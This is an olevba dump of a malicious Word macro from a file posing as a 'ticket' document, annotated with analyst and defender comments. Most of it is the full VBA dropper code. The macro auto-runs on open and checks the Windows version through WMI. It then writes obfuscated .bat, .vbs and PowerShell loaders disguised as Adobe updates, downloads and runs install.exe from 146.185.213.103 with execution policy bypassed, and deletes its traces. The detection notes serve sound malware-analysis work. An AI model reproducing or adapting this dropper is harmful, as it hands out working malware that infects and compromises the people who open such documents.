  1. FILE: 20152701-7203849_ticket.doc
  2. Type: OpenXML
  3. -------------------------------------------------------------------------------
  4. VBA MACRO ThisDocument.cls
  5. in file: word/vbaProject.bin - OLE stream: VBA/ThisDocument
  6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Auto-exec entry point flagged in the olevba ANALYSIS table below: Word runs
  ' it when the document is opened.  It only forwards to h(), the dropper body.
  ' AutoOpen() and Workbook_Open() further down are aliases for it, so the same
  ' payload fires whichever host application (Word or Excel) loads the project.
  ' Defender note: blocking macro auto-execution (or enforcing Mark-of-the-Web
  ' macro blocking) stops this document before any of h() runs.
  7. Sub Auto_Open()
  8. h
  9. End Sub
  ' Dropper body.  Read straight from the listing, it does five things:
  '   1. builds the names and paths of the files it will drop, assembling the
  '      strings piecewise with Chr()/Asc()/"+"/"&" (the Chr obfuscation olevba
  '      flags below) and padding the code with dead junk-string assignments;
  '   2. removes any earlier copies of those files (errors suppressed);
  '   3. reads the OS version through WMI (Win32_OperatingSystem);
  '   4. writes and launches an OS-specific loader chain that downloads
  '      http://146.185.213.103/upd/install.exe to a file named 444.exe and
  '      runs it, then deletes the loader scripts;
  '   5. scrubs <select>/<inbox> marker tags out of the open document text
  '      (via findTest/secondTest and the Find/Replace loops at the end).
  ' Decoded from the Chr() arithmetic with ds = 100 (Chr(115) = "s",
  ' Chr(116) = "t"), the dropped file names are adobeacd-update.ps1,
  ' adobeacd-update.vbs, adobeacd-update.bat and adobeacd-updatexp.vbs.
  ' Defender notes: artefacts land in c:\Users\<user>\AppData\Local\Temp and
  ' c:\Windows\Temp; the behavioural signal is the Office process writing
  ' .bat/.vbs/.ps1 files to Temp and then spawning cscript.exe / powershell.exe
  ' (with -ExecutionPolicy bypass), preceded by a WMI query from the same
  ' process.  The only network IOC visible in the code is 146.185.213.103;
  ' 1.1.2.2 is just the target of "ping -n N" used as a sleep in the .bat.
  10. Sub h()
  11. Dim MY_FILENDIR, ASDASDSA, MY_FILDIR, XPFILEDIR
  12. USER = Environ("username")
  13. ds = 100
  14. jks = ds
  ' --- 1. file names.  PST* = .ps1, VBT* = .vbs, VBTXP = the XP-branch .vbs,
  ' BART = .bat; all share the "adobeacd-update" stem.  ASDSA, ASJDKHSJADASDSA
  ' and the other upper-case junk strings are never read again (padding).
  15. PST2 = "a" + "dobe" & "acd-u" & "pdate"
  16. PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1"
  17. ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
  18.  
  19. VBT2 = "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te"
  20. VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
  21. VBTXP2 = "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p"
  22. VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
  23. BART2 = "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date"
  24. BART = BART2 + Chr(Abs(46)) + Chr(Abs(98)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(ds + 16))) + ""
  25.  
  ' Full paths: the user-profile Temp folder for the .ps1/.bat/.vbs used on
  ' newer Windows, c:\Windows\Temp for the XP-branch .vbs and .bat.
  ' TRT / KRT / HYF are three names for the same c:\Windows\Temp\...bat path.
  26. MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
  27. ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
  28. ASDASDSA = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
  29. MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
  30. XPFILEDIR = "c:\Windows\Temp\" + VBTXP
  31. TRT = "c:\Windows\Temp\" + BART
  32. KRT = TRT
  33. HYF = KRT
  34.  
  ' --- 2. remove leftovers from a previous run.  On Error Resume Next hides
  ' any failure; SetAttr ... vbNormal clears read-only/hidden before Kill.
  35. On Error Resume Next
  36. SetAttr MY_FILENDIR, vbNormal
  37.  
  38. If (Len(Dir(MY_FILENDIR)) <> 0) Then
  39. Kill MY_FILENDIR
  40. End If
  41.  
  42. On Error Resume Next
  43. SetAttr ASDASDSA, vbNormal
  44. If (Dir(ASDASDSA) <> "") Then
  45. Kill ASDASDSA
  46. End If
  47.  
  48. On Error Resume Next
  49. SetAttr MY_FILDIR, vbNormal
  50. If (Dir(MY_FILDIR) <> "") Then
  51. Kill MY_FILDIR
  52. End If
  53.  
  54. On Error Resume Next
  55. SetAttr XPFILEDIR, vbNormal
  56. If (Dir(XPFILEDIR) <> "") Then
  57. Kill XPFILEDIR
  58. End If
  59.  
  ' File handles.  FreeFile does not reserve the number it returns, so with no
  ' Open in between these presumably all hold the same value; harmless here
  ' because only one file is ever open at a time.  FileNu/mttt/jks are noise.
  60. Dim FileNumber As Integer
  61. Dim FileNumb As Integer
  62. Dim FileNu As Integer
  63. Dim FileNuG As Integer
  64. Dim FileNukk As Integer
  65. Dim FileNs As Integer
  66. Dim mttt As Integer
  67. Dim retVal As Variant
  68. Dim jskw As Integer
  69. FileNumber = FreeFile
  70. FileNumb = FreeFile
  71. FileNu = FreeFile
  72. FileNukk = FreeFile
  73. FileNs = FreeFile
  74. FileNuG = FreeFile
  ' --- 3. OS fingerprint via WMI.  The first query builds SysReport, which is
  ' never used afterwards; the second repeats the query just to get Version.
  ' Detection: an Office process connecting to winmgmts: and querying
  ' Win32_OperatingSystem is an unusual and loggable event.
  75. Dim objWMIService As Variant
  76. Dim colOperatingSystems As Variant
  77. Dim objOperatingSystem As Variant
  78. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  79. Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  80. For Each objOperatingSystem In colOperatingSystems
  81. SysReport = SysReport & "The operating system on this computer is " & _
  82. objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")"
  83. Next
  84.  
  85. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  86. Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  87. For Each objOperatingSystem In colOperatingSystems
  88. winverstr = objOperatingSystem.Version
  89. Next
  90.  
  91.  
  ' Val("5.1.2600") -> 5.1; assigning it to the Integer jskw rounds to 5, so
  ' the first branch covers NT 5.x (XP / Server 2003 era) and the second
  ' (winver > 5.5) covers Vista and later.  WaitFor is the busy-sleep helper
  ' defined below.
  92. winver = Val(winverstr)
  93. WaitFor (1)
  94. jskw = winver
  95.  
  ' --- 4a. NT 5.x branch: a .bat in c:\Windows\Temp that runs the .vbs written
  ' next with cscript, waits (ping as sleep), runs c:\Windows\Temp\444.exe,
  ' then loops deleting the .vbs and itself until both are gone.
  96. If (jskw <= 5.5) Then
  97. Open HYF For Output As #FileNuG
  98. Print #FileNuG, "@echo off"
  99. Print #FileNuG, "ping 1.1.2.2 -n" & " 2"
  100. Print #FileNuG, ":ksadatk"
  101. PRINTFILENUGSAASJHKDJSAKHDS = "ASKDHJASKDJKAHDSHJKASH HJKAHJSA JK"
  102. PRISAKUDHNTFILENUGSAASJHKDJSAKHDS = "ASKDHJASSJKADHKDJKAHDSHJKASH HJKAHJKASHDJSA JK"
  103. Print #FileNuG, ":kcscriptw"
  104. Print #FileNuG, ":asdsadas"
  105. Print #FileNuG, ":cscripdiqwojd"
  106. Print #FileNuG, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + ""
  107. Print #FileNuG, "ping 1.1.2.2 -n" & " 2"
  108. Print #FileNuG, "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + "x" + "e"
  109. Print #FileNuG, ":loop"
  110. Print #FileNuG, "ping 1.1.2.2 -n" & " 1"
  111. Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
  112. Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
  113. Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + BART + Chr(34) + " goto loop"
  114. Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + VBTXP + Chr(34) + " goto loop"
  115. Print #FileNuG, "exit"
  116. Close #FileNuG
  117.  
  ' The XP-branch .vbs: an HTTP GET of install.exe from 146.185.213.103 through
  ' an MSXML2 XMLHTTP object (the class name is spelled out from Chr(mttt)
  ' arithmetic with mttt = 88), with the body saved to c:\Windows\Temp\444.exe
  ' through an ADODB.Stream.  Line 126 is an earlier, commented-out variant.
  118. WaitFor (2)
  119. mttt = 88
  120.  
  121. Open XPFILEDIR For Output As #FileNumber
  122. Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://146.185.213.103/upd/install" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  123. Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  124.  
  125. Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(mttt - 4) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
  126. 'Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
  127.  
  128. Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
  129.  
  130. Print #FileNumber, "objXMLHTTP.send() "
  131. Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
  132.  
  133. Print #FileNumber, "Set objADOStream = C" + "reateO" + "bject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "
  134.  
  135. Print #FileNumber, "objADOStream.Open "
  136. Print #FileNumber, "objADOStream.Type = 1"
  137. Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "sponse" + "Body "
  138. Print #FileNumber, "objADOStream.Position = 0 "
  139. Print #FileNumber, "objADOStream.SaveToFile strTecation "
  140. Print #FileNumber, "objADOStream.Close "
  141. Print #FileNumber, "Set objADOStream = Nothing "
  142. Print #FileNumber, "End if "
  143. Print #FileNumber, "Set objXMLHTTP = Nothing"
  144. Print #FileNumber, "Set objShell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "S" + "cript." + "S" + "hell" + Chr(34) + ")"
  145. Close #FileNumber
  146.  
  ' Launch the .bat hidden (window style 0); it in turn runs the .vbs.
  147. WaitFor (1)
  148.  
  149. ASKJD = TRT
  150. retVal = Shell(ASKJD, 0)
  151.  
  152. End If
  153.  
  154.  
  ' --- 4b. Vista+ branch.  First a PowerShell script in the user's Temp:
  ' System.Net.WebClient download of the same URL to Temp\444.exe with a
  ' spoofed Mac Safari User-Agent, a 15 s sleep, cmd.exe /c to run it, then
  ' removal of the .vbs, .bat, 444.exe and the script itself.  The script-path
  ' strings are built as 'name'+'.'+'ext' so the extension never appears
  ' contiguously in the .ps1 text.
  155. If (winver > 5.5) Then
  156. Open MY_FILENDIR For Output As #FileNumber
  157. Print #FileNumber, "$down = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
  158. Print #FileNumber, "$url = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://146.185.213.103/upd/install" & ".e" & "x" + "e';"
  159. Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
  160. Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25';" + ""
  161. Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
  162. Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
  163. Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
  164.  
  165. Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + ";"
  ' Line 166 uses ";" as the Print # item separator (no space between BART2
  ' and the quote that follows), so the output line is still well formed.
  166. Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART2; Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
  167. Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s1" + Chr(39) + ";"
  168.  
  169. Print #FileNumber, "Start-Sleep -s 15;"
  170. Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; "
  171. Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
  172. Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
  173. Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
  174. Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
  175. Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
  176. Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
  177. Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
  178. Close #FileNumber
  179.  
  ' Then the .vbs launcher: resolves its own directory, builds the .ps1 path
  ' and runs it through WScript.Shell as
  ' "powershell.exe -noexit -ExecutionPolicy bypass -noprofile -file <ps1>"
  ' (spelled out with Chr() for the letters o/S/X).  The "-ExecutionPolicy
  ' bypass" command line is a strong detection string; "dff" is unused noise.
  180. Open MY_FILDIR For Output As #FileNumb
  181. Print #FileNumb, "Dim dff"
  182. Print #FileNumb, "dff = 68"
  183. Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
  184. Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & Chr(34) & "&" & "S" & Chr(34) & Chr("&") & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
  185. Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST2 + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s1" + Chr(34)
  186. Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
  187. Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
  188. Close #FileNumb
  189.  
  ' Finally the .bat in the user's Temp: ping-sleep, chcp 1251 (Cyrillic code
  ' page), then cscript.exe on the .vbs, with the ".vbs" extension assembled
  ' from three batch variables at run time.
  190. Open ASDASDSA For Output As #FileNs
  191. Print #FileNs, "@echo off"
  192. Print #FileNs, "ping 1.1.2.2 -n" & " 2"
  193. Print #FileNs, "chcp 1251"
  194. Print #FileNs, ":csakclasjdklas"
  195. Print #FileNs, "set Var1=" + Chr(34) + "." + Chr(34)
  196. Print #FileNs, "set Var2=" + Chr(34) + "v" + Chr(34)
  197. Print #FileNs, "set Var3=" + Chr(34) + "bs" + Chr(34)
  198. Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT2 + Chr(34) + "%Var1%%Var2%%Var3%"
  199. Print #FileNs, "exit"
  200. Close #FileNs
  201.  
  202. SetAttr MY_FILENDIR, vbNormal
  203. SetAttr ASDASDSA, vbNormal
  204. SetAttr MY_FILDIR, vbNormal
  205.  
  ' Kick off the chain: .bat (hidden window) -> cscript .vbs -> powershell .ps1.
  206. WaitFor (1)
  207. SJAKLD = ASDASDSA
  208. retVal = Shell(SJAKLD, 0)
  209. End If
  210.  
  211.  
  ' --- 5. document scrub.  findTest deletes the text between <select> and
  ' </select>, secondTest recolours the text between <inbox> and </inbox>
  ' black, and the four loops below blank the marker tags themselves in every
  ' story range.  Presumably this swaps the lure content for the real text
  ' once the payload has run; the markers are worth searching for in the raw
  ' document XML when triaging similar samples.
  212. findTest
  213. secondTest
  214. For Each myStoryRange In ActiveDocument.StoryRanges
  215. With myStoryRange.Find
  216. .Text = "<" & "sel" & "ect>"
  217. .Replacement.Text = " "
  218. .Wrap = wdFindContinue
  219. .Execute Replace:=wdReplaceAll
  220. End With
  221. Next myStoryRange
  222.  
  223. For Each myStoryRange In ActiveDocument.StoryRanges
  224. With myStoryRange.Find
  225. .Text = "</s" & "ele" & "ct>"
  226. .Replacement.Text = " "
  227. .Wrap = wdFindContinue
  228. .Execute Replace:=wdReplaceAll
  229. End With
  230. Next myStoryRange
  231.  
  232. For Each myStoryRange In ActiveDocument.StoryRanges
  233. With myStoryRange.Find
  234. .Text = "<" & "in" & "box>"
  235. .Replacement.Text = " "
  236. .Wrap = wdFindContinue
  237. .Execute Replace:=wdReplaceAll
  238. End With
  239. Next myStoryRange
  240.  
  241. For Each myStoryRange In ActiveDocument.StoryRanges
  242. With myStoryRange.Find
  243. .Text = "</" & "in" & "box>"
  244. .Replacement.Text = " "
  245. .Wrap = wdFindContinue
  246. .Execute Replace:=wdReplaceAll
  247. End With
  248. Next myStoryRange
  249.  
  250.  
  251. End Sub
  ' Busy-wait sleep used by h() between dropping a file and launching it.
  ' NumOfSeconds: how long to spin.  Spins on Timer (seconds since midnight)
  ' while pumping DoEvents so the Word UI stays responsive; because Timer
  ' resets at midnight a wait that straddles it ends immediately, which the
  ' dropper does not care about.  Sandboxes that accelerate Timer/DoEvents
  ' shorten these delays without changing behaviour.
  252. Sub WaitFor(NumOfSeconds As Long)
  253. Dim SngSec As Long
  254. SngSec = Timer + NumOfSeconds
  255.  
  256. Do While Timer < SngSec
  257. DoEvents
  258. Loop
  259.  
  260. End Sub
  261.  
  ' Word-style auto-exec name (no underscore); forwards to Auto_Open so the
  ' dropper runs under either naming convention.
  262. Sub AutoOpen()
  263. Auto_Open
  264. End Sub
  ' Excel workbook auto-exec name; forwards to Auto_Open so the same payload
  ' fires if this VBA project is loaded by Excel rather than Word.
  265. Sub Workbook_Open()
  266. Auto_Open
  267. End Sub
  ' Deletes the document text enclosed between a "<select>" and "</select>"
  ' marker pair (called from h() after the loader has been launched).
  ' Flow: find the opening tag in the whole document range and collapse to
  ' its end; start selRange there; find the closing tag, collapse to its
  ' start; end selRange there; delete the enclosed text.  The tag strings are
  ' split with "+"/"&" so the literal "<select>" does not appear in the
  ' module.  The ASK* assignments are dead junk strings.
  ' Note: Range.Delete returns a count, not text, so selectedText is
  ' effectively unused.
  268. Sub findTest()
  269. Dim firstTerm As String
  270. Dim secondTerm As String
  271. Dim rrtt As Range
  272. Dim selRange As Range
  273. Dim selectedText As String
  274.  
  275. Set rrtt = ActiveDocument.Range
  276. firstTerm = "<" + "s" + "e" & "le" + "ct>"
  277. secondTerm = "<" + "/" + "se" + "l" & "ec" + "t>"
  278. ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
  279. With rrtt.Find
  280. .Text = firstTerm
  281. .MatchWholeWord = True
  282. .Execute
  283. ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
  ' rrtt now spans the opening tag; collapse so selRange starts just after it.
  284. rrtt.Collapse direction:=wdCollapseEnd
  285. Set selRange = ActiveDocument.Range
  286. selRange.Start = rrtt.End
  287. .Text = secondTerm
  288. .MatchWholeWord = True
  289. .Execute
  290. ASKSASADW = "asjldklas"
  ' rrtt now spans the closing tag; collapse so selRange ends just before it.
  291. rrtt.Collapse direction:=wdCollapseStart
  292. selRange.End = rrtt.Start
  293. selectedText = selRange.Delete
  294. End With
  295. End Sub
  296.  
  ' Same find/collapse pattern as findTest, but for the "<inbox>" / "</inbox>"
  ' marker pair: instead of deleting the enclosed text it sets its font colour
  ' to black.  Presumably that text was stored in an invisible colour as part
  ' of the lure and is revealed once the payload has run — confirm against
  ' the document body when triaging.  myRanget and the ASK* strings are
  ' unused; selectedTextt receives the Range's default (text) value and is
  ' not read again.
  297. Sub secondTest()
  298. Dim firstTerm As String
  299. Dim secondTerm As String
  300. Dim myRanget As Range
  301. Dim yytt As Range
  302. Dim selRanget As Range
  303. Dim selectedTextt As String
  304.  
  305. Set yytt = ActiveDocument.Range
  306. firstTerm = "<" + "in" & "bo" + "x>"
  307. secondTerm = "</" + "in" & "bo" + "x>"
  308. ASKASKLDJASLIASEJSASAHBDJ = "SAJDkssadsaajd lkasj ldkasjdlk askl djslakj d"
  309. With yytt.Find
  310. .Text = firstTerm
  311. .MatchWholeWord = True
  312. .Execute
  313. ASKIEJ = "ask as8d j dnkjh12kh1 sad"
  ' Opening tag found: selRanget starts right after it.
  314. yytt.Collapse direction:=wdCollapseEnd
  315. ASKASKLDJASASLIEJSASAHBDJ = "SAJDksajd lkasjasd ldkasjdlk askl djslakj d"
  316. Set selRanget = ActiveDocument.Range
  317. selRanget.Start = yytt.End
  318. .Text = secondTerm
  319. .MatchWholeWord = True
  320. .Execute
  321. ASKASKASLDJASLIEJSASAHBDJ = "SAJDksajd lkdsasj ldkasjdlk askl djslakj d"
  ' Closing tag found: selRanget ends right before it, then recolour.
  322. yytt.Collapse direction:=wdCollapseStart
  323. selRanget.End = yytt.Start
  324. selectedTextt = selRanget
  325. selRanget.Font.Color = wdColorBlack
  326. End With
  327. End Sub
  328. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  329. ANALYSIS:
  330. +------------+-----------------+-----------------------------------------+
  331. | Type | Keyword | Description |
  332. +------------+-----------------+-----------------------------------------+
  333. | AutoExec | AutoOpen | Runs when the Word document is opened |
  334. | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
  335. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  336. | Suspicious | Open | May open a file |
  337. | Suspicious | Shell | May run an executable file or a system |
  338. | | | command |
  339. | Suspicious | Environ | May read system environment variables |
  340. | Suspicious | Write | May write to a file (if combined with |
  341. | | | Open) |
  342. | Suspicious | Output | May write to a file (if combined with |
  343. | | | Open) |
  344. | Suspicious | Print # | May write to a file (if combined with |
  345. | | | Open) |
  346. | Suspicious | Windows | May enumerate application windows (if |
  347. | | | combined with Shell.Application object) |
  348. | Suspicious | Chr | May attempt to obfuscate specific |
  349. | | | strings |
  350. | IOC | 1.1.2.2 | IPv4 address |
  351. | IOC | 146.185.213.103 | IPv4 address |
  352. +------------+-----------------+-----------------------------------------+
  353. -------------------------------------------------------------------------------
  354. VBA MACRO UserForm1.frm
  355. in file: word/vbaProject.bin - OLE stream: VBA/UserForm1
  356. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  357. (empty macro)